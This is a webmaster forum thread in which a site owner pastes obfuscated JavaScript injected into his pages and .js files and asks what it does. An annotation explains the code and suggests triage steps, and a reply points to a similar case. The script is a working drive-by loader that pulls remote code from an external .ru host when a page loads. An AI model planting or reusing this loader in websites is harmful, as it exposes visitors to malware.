
View Full Version : An interesting hack - 4 hours ago...



OLYMPOS
05-22-2010, 09:20 AM
Dear all WPW members and webmasters,


About 4 hours ago, one of my websites got hacked. The following code has been added to all websites after the closing </html> tag, as well as to the bottom of all .js files (not to .css or .xml files).

All my contact / booking / login forms run over https://, and the check files additionally filter out characters such as < and [.

Any idea what that's all about? All comments are highly appreciated.

This was the code added:

<script>/*
 * Reviewer annotation (comment only; the injected sample itself is unchanged).
 *
 * What the visible code does:
 *  - a(Q,h,Qa) wraps substr(), and M(Q,h) deletes from Q every character listed
 *    in h. Both are used only to rebuild strings from padded fragments.
 *  - Rebuilt strings: "script", "createElement", "src", "defer" and "body".
 *    The number z is 41897-33817 = 8080.
 *  - A() creates a script element, sets its src to
 *      hxxp://terminalpoem[.]ru:8080/google.com/zanox-affiliate.de/youporn.com.php
 *    (defanged here), sets defer, and appends the element to document.body.
 *    Its catch block only assigns unused variables, so errors are ignored silently.
 *  - L() runs immediately to build the strings. window.onload=A then replaces
 *    whatever handler was assigned to window.onload before it, so the remote
 *    script is requested once the page has loaded.
 *  - The remaining assignments (this.QE, TC, kS, S, O, CW, ...) are never read
 *    in this snippet; presumably padding to defeat signature matching.
 *
 * The well-known site names are in the URL path, not the host. The request goes
 * to the .ru host on port 8080.
 *
 * NOTE(review): the post says this was appended to pages and .js files on disk,
 * which suggests write access to the web root rather than a form-input problem.
 * Confirm against file modification times and FTP/SSH/control-panel logs.
 * Restore the files from a known-good copy and rotate those credentials.
 * For triage, search for the literal "this.QE=false" and for the 32-hex HTML
 * comment that follows the script; that comment looks like an infection marker.
 * Also review proxy/DNS logs for the host above.
 */this.QE=false;var TC={k:"E"};this.kS=37290;this.kS++;S=55649;S-=94;var A;var O=["hb","AR"];var CW=["B","x"];L=function(){var sa=false;var De=["_","e","w"];function a(Q,h,Qa){return Q.substr(h,Qa);}try {} catch(p){};Je={c:false};var X='';var P=document;try {var xw='kJ'} catch(xw){};try {var Zy='GK'} catch(Zy){};var T=RegExp;this.LK=28377;this.LK--;var EJ=["Tm","g"];var D=new String("/g"+"oo"+a("glPxHR",0,2)+a("e.ud4C",0,2)+a("IP3Sco3SPI",4,2)+a("m/OCT",0,2)+a("FDiZzaiDFZ",4,2)+a("gcqnocqg",3,2)+a("x-tWUT",0,2)+"af"+"fi"+a("rK6olio6Kr",4,2)+"at"+a("e.iqNI",0,2)+a("deSzML",0,2)+a("/y71LT",0,2)+a("ouTPYl",0,2)+a("xsK2poxK2s",4,2)+a("rnGUjE",0,2)+a(".cKSO",0,2)+a("omSKA2",0,2)+a(".pRZS",0,2)+a("hp7W5m",0,2));Lb=["u","aB"];IQ=["mu","TL"];function M(Q,h){BS=62196;BS-=136;this.LQ=21906;this.LQ++;var Qa=new String("[")+h+new String(a("]CDNo",0,1));var Ls={TZ:33385};var Un='';var I=new T(Qa, String("g"));return Q.replace(I, X);RG={bX:false};};kv={ut:"OZ"};BY={_J:"j"};var Z=null;var VQ=26957;this.sP=14567;this.sP--;var J=M('sOcgrKiDpyt_','v0hOzKwaN1LlSBJ_Xdg4yDF');var Aa=String("bo"+a("dyuC0r",0,2));Oe={oR:false};Vy=5707;Vy-=33;var z=41897-33817;WU=["HP","eZ"];var li=new String();A=function(){try {zb=["qG","go","Sw"];var qk=36069;var DK=M('c2rWe_aGtKeWE3lZe_m3eWnGto','L1XZJkNI3RCWVSo 2D_GK');s=P[DK](J);var bg=new String();this.mV=46689;this.mV-=137;var VP='';var Q=z+D;try {var SI='Th'} catch(SI){};var Rb={};var N=M('sorCcS','C3_Kk7JS921hWBzUeuPoQjy');var NZ="def"+a("ery1uZ",0,2);s[N]=String("ht"+a("tpfVCr",0,2)+a("r3Td:/3rTd",4,2)+"/t"+"er"+a("miMfQ3",0,2)+a("naqTI",0,2)+a("lph2D7",0,2)+"oe"+a("m.eDT",0,2)+a("PmNrumNP",3,2)+a(":cT5",0,1))+Q;var PP=["uO"];s[NZ]=[1,2][0];P[Aa].appendChild(s);pQ={sF:"GJ"};this.EE=38135;this.EE-=179;qb=32401;qb--;} catch(b){var jS={wt:"ZZ"};var jc=new Array();};};CE=5268;CE+=137;var kE="kE";};cP=28120;cP+=117;var Gj={pW:false};L();var Pb=new String();UE=["f"];window.onload=A;Fc={BK:"S_"};this.hw=46428;this.hw+=69;</script>
<!--29db6d0b1ed108a8ffd23923b5cb460c-->

cheers,
olympos

chandrika
05-22-2010, 10:37 AM
I did find this post on another forum (about the 8th post down you will see the code posted by 1*1). The code looks very similar, and there are a few links from there, which I briefly looked at, mentioning iframe injection attacks. That was all I could find, and it isn't clear to me, but maybe you will find something from there....

http://translate.google.co.uk/translate?hl=en&sl=ro&u=http://www.krond.org/forum/viewtopic.php%3Ff%3D8%26p%3D23127&ei=DuT3S77QDozw0gSLiZjqBw&sa=X&oi=translate&ct=result&resnum=2&ved=0CBsQ7gEwAQ&prev=/search%3Fq%3D%2522this.QE%253Dfalse%2522%26hl%3Den